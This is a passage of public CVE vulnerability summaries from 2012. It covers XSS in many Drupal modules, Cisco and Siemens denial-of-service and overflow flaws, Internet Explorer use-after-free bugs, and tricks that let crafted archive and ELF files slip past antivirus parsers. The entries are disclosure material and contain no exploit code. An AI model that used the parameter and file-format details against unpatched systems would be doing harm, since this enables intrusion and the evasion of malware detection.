perform database operations via a SOAP request, as demonstrated by the initializeQueryDatabase2 request. [CVE-2012-1825] Multiple cross-site scripting (XSS) vulnerabilities in the status program on the ForeScout CounterACT appliance with software 6.3.3.2 through 6.3.4.10 allow remote attackers to inject arbitrary web script or HTML via (1) the loginname parameter in a forgotpass action or (2) the username parameter. [CVE-2012-1821] The Network Threat Protection module in the Manager component in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.700x on Windows Server 2003 allows remote attackers to cause a denial of service (web-server outage, or daemon crash or hang) via a flood of packets that triggers automated blocking of network traffic. [CVE-2012-1814] Cross-site scripting (XSS) vulnerability in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, 11.3, and 11.3.1 and DeltaV ProEssentials Scientific Graph 5.0.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1809] The web server in the ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, H2-ECOM-F, H2-ECOM100, H4-ECOM, H4-ECOM-F, and H4-ECOM100 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors. [CVE-2012-1808] The web server in the ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, H2-ECOM-F, H2-ECOM100, H4-ECOM, H4-ECOM-F, and H4-ECOM100 does not require authentication, which allows remote attackers to perform unspecified functions via unknown vectors. [CVE-2012-1807] Cross-site scripting (XSS) vulnerability in the web server in the ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, H2-ECOM-F, H2-ECOM100, H4-ECOM, H4-ECOM-F, and H4-ECOM100 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1802] Buffer overflow in the embedded web server on the Siemens Scalance X Industrial Ethernet switch X414-3E before 3.7.1, X308-2M before 3.7.2, X-300EEC before 3.7.2, XR-300 before 3.7.2, and X-300 before 3.7.2 allows remote attackers to cause a denial of service (device reboot) or possibly execute arbitrary code via a malformed URL. [CVE-2012-1801] Multiple stack-based buffer overflows in (1) COM and (2) ActiveX controls in ABB WebWare Server, WebWare SDK, Interlink Module, S4 OPC Server, QuickTeach, RobotStudio S4, and RobotStudio Lite allow remote attackers to execute arbitrary code via crafted input data. [CVE-2012-1799] The web server on the Siemens Scalance S Security Module firewall S602 V2, S612 V2, and S613 V2 with firmware before 2.3.0.3 does not limit the rate of authentication attempts, which makes it easier for remote attackers to obtain access via a brute-force attack on the administrative password. [CVE-2012-1795] webglimpse.cgi in Webglimpse before 2.20.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the query parameter, as exploited in the wild in March 2012. [CVE-2012-1792] Cross-site scripting (XSS) vulnerability in osCommerce/OM/Core/Site/Setup/Application/Install/RPC/DBCheck.php in OSCommerce Online Merchant 3.0.2, when the software is being installed, allows remote attackers to inject arbitrary web script or HTML via the name parameter to oscommerce/index.php, which is not properly handled in an error message. NOTE: this might not be a vulnerability, since the ability to access oscommerce/index.php during installation may already imply administrator privileges. [CVE-2012-1790] Absolute path traversal vulnerability in Webgrind 1.0 and 1.0.2 allows remote attackers to read arbitrary files via a full pathname in the file parameter to index.php. [CVE-2012-1789] Multiple cross-site scripting (XSS) vulnerabilities in Kongreg8 1.7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) surname or (2) firstname parameters to modules/members/addmember.php [CVE-2012-1788] Multiple cross-site scripting (XSS) vulnerabilities in wonderdesk.cgi in WonderDesk SQL 4.14 allow remote attackers to inject arbitrary web script or HTML via the (1) cus_email parameter in a cust_lostpw action [CVE-2012-1787] Multiple cross-site scripting (XSS) vulnerabilities in wgarcmin.cgi in Webglimpse 2.20.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) URL, (2) FILE, or (3) DOMAIN parameters. [CVE-2012-1782] Multiple cross-site scripting (XSS) vulnerabilities in questions/ask in OSQA 3b allow remote attackers to inject arbitrary web script or HTML via the (1) url bar or (2) picture bar. [CVE-2012-1781] Multiple cross-site scripting (XSS) vulnerabilities in ajax/commentajax.php in SocialCMS 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) TREF_email_address or (2) TR_name parameters. [CVE-2012-1779] Cross-site scripting (XSS) vulnerability in IDevSpot idev-BusinessDirectory 3.0 allows remote attackers to inject arbitrary web script or HTML via the SEARCH parameter to index.php. [CVE-2012-1738] Unspecified vulnerability in the Oracle iPlanet Web Server component in Oracle Sun Products Suite Java System Web Server 6.1 and Oracle iPlanet Web Server 7.0 allows remote attackers to affect availability via unknown vectors related to Web Server. [CVE-2012-1731] Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web UI. [CVE-2012-1712] Directory traversal vulnerability in the Liferay component in Oracle Sun GlassFish Web Space Server before 10.0 Update 7 Patch 2 has unknown impact and attack vectors. [CVE-2012-1710] Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Designer. [CVE-2012-1709] Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Designer. [CVE-2012-1701] Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Highly Interactive Web UI. [CVE-2012-1674] Unspecified vulnerability in the Siebel Clinical component in Oracle Industry Applications 7.7, 7.8, 8.0.0.x, 8.1.1.x, and 8.2.2.x allows remote authenticated users to affect integrity via unknown vectors related to Web UI. [CVE-2012-1660] Multiple cross-site scripting (XSS) vulnerabilities in components/select.inc in the Webform module 6.x-3.x before 6.x-3.17 and 7.x-3.x before 7.x-3.17 for Drupal, when the "Select (or other)" module is enabled, allow remote authenticated users with the create webform content permission to inject arbitrary web script or HTML via vectors related to (1) checkboxes or (2) radios. [CVE-2012-1659] Cross-site scripting (XSS) vulnerability in the Node Recommendation module 6.x-1.x before 6.x-1.1 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1658] Cross-site scripting (XSS) vulnerability in the Read More Link module 6.x-3.x before 6.x-3.1 for Drupal allows remote authenticated users with the access administration pages permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1657] Cross-site scripting (XSS) vulnerability in block_class.module in the Block Class module before 7.x-1.1 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via the class name. [CVE-2012-1654] Multiple cross-site scripting (XSS) vulnerabilities in the Data module 6.x-1.x before 6.x-1.0 and 7.x-1.x before 7.x-1.0-alpha3 for Drupal allow remote authenticated users with the administer data tables permission to inject arbitrary web script or HTML via the title parameter in (1) data.views.inc and (2) data_ui/data_ui.admin.inc. [CVE-2012-1653] Cross-site scripting (XSS) vulnerability in the Taxonomy Views Integrator (TVI) module 6.x-1.x before 6.x-1.3 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, related to "views pages." [CVE-2012-1652] Cross-site scripting (XSS) vulnerability in the Hierarchical Select module 6.x-3.x before 6.x-3.8 for Drupal allows remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML via unspecified vectors related to "the vocabulary's help text." [CVE-2012-1651] Cross-site scripting (XSS) vulnerability in the Submenu Tree module before 6.x-1.5 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1648] Cross-site scripting (XSS) vulnerability in the Cool Aid module before 6.x-1.9 for Drupal allows remote authenticated users with the administer coolaid permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1647] Multiple cross-site scripting (XSS) vulnerabilities in the "stand alone PHP application for the OSM Player," as used in the MediaFront module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.5 for Drupal, allow remote attackers to inject arbitrary web script or HTML via (1) $_SERVER['HTTP_HOST'] or (2) $_SERVER['SCRIPT_NAME'] to players/osmplayer/player/OSMPlayer.php, (3) playlist parameter to players/osmplayer/player/getplaylist.php, and possibly other vectors related to $_SESSION. [CVE-2012-1646] Multiple cross-site scripting (XSS) vulnerabilities in the FAQ module 6.x-1.x before 6.x-1.13 and 7.x-1.x-rc1 for Drupal allow remote authenticated users to inject arbitrary web script or HTML via the (1) title parameter in faq.admin.inc or (2) detailed_question parameter in faq.module. [CVE-2012-1640] Multiple cross-site scripting (XSS) vulnerabilities in the Managesite module 6.x-1.x before 6.1-1.1 for Drupal allow remote authenticated users with "administer managesite" permissions to inject arbitrary web script or HTML via the title parameter when (1) adding or (2) updating a category. [CVE-2012-1639] Multiple cross-site scripting (XSS) vulnerabilities in product/commerce_product.module in the Drupal Commerce module for Drupal before 7.x-1.2 allow remote authenticated users to inject arbitrary web script or HTML via the (1) sku or (2) title parameters. [CVE-2012-1634] Cross-site scripting (XSS) vulnerability in video_filter.codecs.inc in the Video Filter module 6.x-2.x and 7.x-2.x for Drupal allows remote attackers to inject arbitrary web script or HTML via the EMBEDLOOKUP parameter for Blip.tv links. [CVE-2012-1632] Cross-site scripting (XSS) vulnerability in password_policy.admin.inc in the Password Policy module before 6.x-1.4 and 7.x-1.0 beta3 for Drupal allows remote authenticated users with administer policies permissions to inject arbitrary web script or HTML via the name parameter. [CVE-2012-1630] Cross-site scripting (XSS) vulnerability in the Taxonomy Navigator module for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1629] Cross-site scripting (XSS) vulnerability in the Taxotouch module for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1628] Cross-site scripting (XSS) vulnerability in the SuperCron module for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1627] Cross-site scripting (XSS) vulnerability in vud_term.module in the Vote Up/Down module 6.x-2.x before 6.x-2.8 and 6.x-3.x before 6.x-3.1 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via taxonomy terms. [CVE-2012-1624] Multiple cross-site scripting (XSS) vulnerabilities in the Lingotek module 6.x-1.x before 6.x-1.40 for Drupal allow remote authenticated users to inject arbitrary web script or HTML when (1) creating or (2) editing page content. [CVE-2012-1613] Cross-site scripting (XSS) vulnerability in edit_one_pic.php in Coppermine Photo Gallery before 1.5.20 allows remote authenticated users with certain privileges to inject arbitrary web script or HTML via the keywords parameter. [CVE-2012-1612] Cross-site scripting (XSS) vulnerability in the update manager in Joomla! 2.5.x before 2.5.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1608] The t3lib_div::RemoveXSS API method in TYPO3 4.4.0 through 4.4.13, 4.5.0 through 4.5.13, 4.6.0 through 4.6.6, 4.7, and 6.0 allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and inject arbitrary web script or HTML via non printable characters. [CVE-2012-1607] The Command Line Interface (CLI) script in TYPO3 4.4.0 through 4.4.13, 4.5.0 through 4.5.13, 4.6.0 through 4.6.6, 4.7, and 6.0 allows remote attackers to obtain the database name via a direct request. [CVE-2012-1606] Multiple cross-site scripting (XSS) vulnerabilities in the Backend component in TYPO3 4.4.0 through 4.4.13, 4.5.0 through 4.5.13, 4.6.0 through 4.6.6, 4.7, and 6.0 allow remote authenticated backend users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1604] Cross-site scripting (XSS) vulnerability in NextBBS 0.6 allows remote attackers to inject arbitrary web script or HTML via the do parameter to index.php. [CVE-2012-1597] Cross-site scripting (XSS) vulnerability in the textEncode function in classes/ezjscajaxcontent.php in eZ JS Core in eZ Publish before 1.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1589] Open redirect vulnerability in the Form API in Drupal 7.x before 7.13 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via crafted parameters in a destination URL. [CVE-2012-1582] Cross-site scripting (XSS) vulnerability in the wikitext parser in MediaWiki 1.17.x before 1.17.3 and 1.18.x before 1.18.2 allows remote attackers to inject arbitrary web script or HTML via a crafted page with "forged strip item markers," as demonstrated using the CharInsert extension. [CVE-2012-1575] Multiple cross-site scripting (XSS) vulnerabilities in Cumin before r5238 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) widgets or (2) pages. [CVE-2012-1564] Cross-site scripting (XSS) vulnerability in administration/create_album.php in YVS Image Gallery allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1539] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreePos Use After Free Vulnerability." [CVE-2012-1538] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CFormElement Use After Free Vulnerability." [CVE-2012-1529] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "OnMove Use After Free Vulnerability." [CVE-2012-1520] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-1513] The Web Configuration tool in VMware vCenter Orchestrator (vCO) 4.0 before Update 4, 4.1 before Update 2, and 4.2 before Update 1 places the vCenter Server password in an HTML document, which allows remote authenticated administrators to obtain sensitive information by reading this document. [CVE-2012-1512] Cross-site scripting (XSS) vulnerability in the internal browser in vSphere Client in VMware vSphere 4.1 before Update 2 and 5.0 before Update 1 allows remote attackers to inject arbitrary web script or HTML via a crafted log-file entry. [CVE-2012-1511] Cross-site scripting (XSS) vulnerability in View Manager Portal in VMware View before 4.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2012-1498] Multiple cross-site request forgery (CSRF) vulnerabilities in Webfolio CMS 1.1.4 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) add an administrator via an add action to admin/users/add or (2) modify a web page via a save action to admin/pages/edit/web_page_name. [CVE-2012-1470] Multiple cross-site scripting (XSS) vulnerabilities in code_editor.php in ocPortal before 7.1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) path or (2) line parameters. [CVE-2012-1469] Multiple cross-site scripting (XSS) vulnerabilities in Open Journal Systems before 2.3.7 allow remote attackers and remote authenticated users to inject arbitrary web script or HTML via the (1) editor or (2) callback parameters to lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php in the iBrowser plugin, (3) authors[][url] parameter to index.php, or (4) Bio Statement or (5) Abstract of Submission fields to the stripUnsafeHtml function in lib/pkp/classes/core/String.inc.php. [CVE-2012-1461] The Gzip file parser in AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, and VBA32 3.12.14.2 allows remote attackers to bypass malware detection via a .tar.gz file with multiple compressed streams. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different Gzip parser implementations. [CVE-2012-1459] The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1457] The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1456] The TAR file parser in AVG Anti-Virus 10.0.0.1190, Quick Heal (aka Cat QuickHeal) 11.00, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Panda Antivirus 10.0.2.7, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a TAR file with an appended ZIP file. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1454] The ELF file parser in Dr.Web 5.0.2.03300, eSafe 7.0.17.0, McAfee Gateway (formerly Webwasher) 2010.1C, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified ei_version field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. [CVE-2012-1453] The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. [CVE-2012-1447] The ELF file parser in Fortinet Antivirus 4.2.254.0, eSafe 7.0.17.0, Dr.Web 5.0.2.03300, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified e_version field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. [CVE-2012-1446] The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee Anti-Virus Scanning Engine 5.400.0.1158, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Norman Antivirus 6.06.12, eSafe 7.0.17.0, Kaspersky Anti-Virus 7.0.0.125, McAfee Gateway (formerly Webwasher) 2010.1C, Sophos Anti-Virus 4.61.0, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified encoding field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. [CVE-2012-1443] The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. [CVE-2012-1442] The ELF file parser in Quick Heal (aka Cat QuickHeal) 11.00, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, eSafe 7.0.17.0, Kaspersky Anti-Virus 7.0.0.125, F-Secure Anti-Virus 9.0.16160.0, Sophos Anti-Virus 4.61.0, Antiy Labs AVL SDK 2.0.3.7, Rising Antivirus 22.83.00.03, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified class field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. [CVE-2012-1431] The ELF file parser in Bitdefender 7.2, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, McAfee Gateway (formerly Webwasher) 2010.1C, nProtect Anti-Virus 2011-01-17.01, Sophos Anti-Virus 4.61.0, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via an ELF file with a \4a\46\49\46 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. [CVE-2012-1430] The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, nProtect Anti-Virus 2011-01-17.01, Sophos Anti-Virus 4.61.0, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via an ELF file with a \19\04\00\10 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. [CVE-2012-1429] The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, and nProtect Anti-Virus 2011-01-17.01 allows remote attackers to bypass malware detection via an ELF file with a ustar character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations. [CVE-2012-1425] The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \50\4B\03\04 character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1413] Cross-site scripting (XSS) vulnerability in zc_install/includes/modules/pages/database_setup/header_php.php in Zen Cart 1.5.0 and earlier, when the software is being installed, allows remote attackers to inject arbitrary web script or HTML via the db_username parameter to zc_install/index.php. [CVE-2012-1410] Multiple cross-site scripting (XSS) vulnerabilities in the History Window implementation in Kadu 0.9.0 through 0.11.0 allow remote attackers to inject arbitrary web script or HTML via a crafted (1) SMS message, (2) presence message, or (3) status description. [CVE-2012-1350] Cisco IOS 12.3 and 12.4 on Aironet access points allows remote attackers to cause a denial of service (radio-interface input-queue hang) via IAPP 0x3281 packets, aka Bug ID CSCtc12426. [CVE-2012-1344] Cisco IOS 15.1 and 15.2, when a clientless SSL VPN is configured, allows remote authenticated users to cause a denial of service (device reload) by using a web browser to refresh the SSL VPN portal page, as demonstrated by the Android browser, aka Bug ID CSCtr86328. [CVE-2012-1338] Cisco IOS 15.0 and 15.1 on Catalyst 3560 and 3750 series switches allows remote authenticated users to cause a denial of service (device reload) by completing local web authentication quickly, aka Bug ID CSCts88664. [CVE-2012-1337] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP10, and T27 LD before SP32 CP1 allows remote attackers to execute arbitrary code via a crafted WRF file, a different vulnerability than CVE-2012-1335 and CVE-2012-1336. [CVE-2012-1336] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP10, and T27 LD before SP32 CP1 allows remote attackers to execute arbitrary code via a crafted WRF file, a different vulnerability than CVE-2012-1335 and CVE-2012-1337. [CVE-2012-1335] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP10, and T27 LD before SP32 CP1 allows remote attackers to execute arbitrary code via a crafted WRF file, a different vulnerability than CVE-2012-1336 and CVE-2012-1337. [CVE-2012-1311] The RSVP feature in Cisco IOS 15.0 and 15.1 and IOS XE 3.2.xS through 3.4.xS before 3.4.2S, when a VRF interface is configured, allows remote attackers to cause a denial of service (interface queue wedge and service outage) via crafted RSVP packets, aka Bug ID CSCts80643. [CVE-2012-1296] Multiple cross-site scripting (XSS) vulnerabilities in apps/admin/handlers/preview.php in Elefant CMS 1.0.x before 1.0.2-Beta and 1.1.x before 1.1.5-Beta allow remote attackers to inject arbitrary web script or HTML via the (1) title or (2) body parameter to admin/preview. [CVE-2012-1293] Multiple cross-site scripting (XSS) vulnerabilities in fup in Frams' Fast File EXchange (FEX, aka fex) before 20111129-2 allow remote attackers to inject arbitrary web script or HTML via the (1) to or (2) from parameters. [CVE-2012-1291] Unspecified vulnerability in the com.sap.aii.mdt.amt.web.AMTPageProcessor servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the Adapter Monitor via unspecified vectors, possibly related to the EnableInvokerServletGlobally property in the servlet_jsp service. 